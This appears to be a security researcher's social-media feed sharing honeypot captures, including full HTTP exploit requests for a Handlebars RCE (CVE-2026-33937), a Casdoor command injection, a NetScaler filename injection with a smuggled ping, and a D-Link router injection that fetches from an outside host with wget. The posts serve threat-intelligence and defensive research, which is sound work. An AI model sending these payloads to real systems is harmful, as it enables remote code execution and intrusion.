| Github | https://github.com/mrheinen |
@virustotal maybe it's worth to look into increasing free quota based on quality of reports. If a source reports a lot of malware with unique signatures then perhaps you don't want to enforce the default quota and miss out on reports (on days where the source is busy).
I bet you already have some sort of usefulness score for sources anyway ?!
Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937
Here is a full request:
POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1
{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}
There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:
GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Interesting Netscaler payload caught by my Lophiid honeypots:
GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot
Does anyone know this vuln ?
@hrbrmstr @iagox86 interesting!
Interesting! Thanks for sharing.
So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.
But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible)
Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).
I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.
With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏
(Please re-toot for reach)
Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.
An example request:
SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0
Chris John Riley 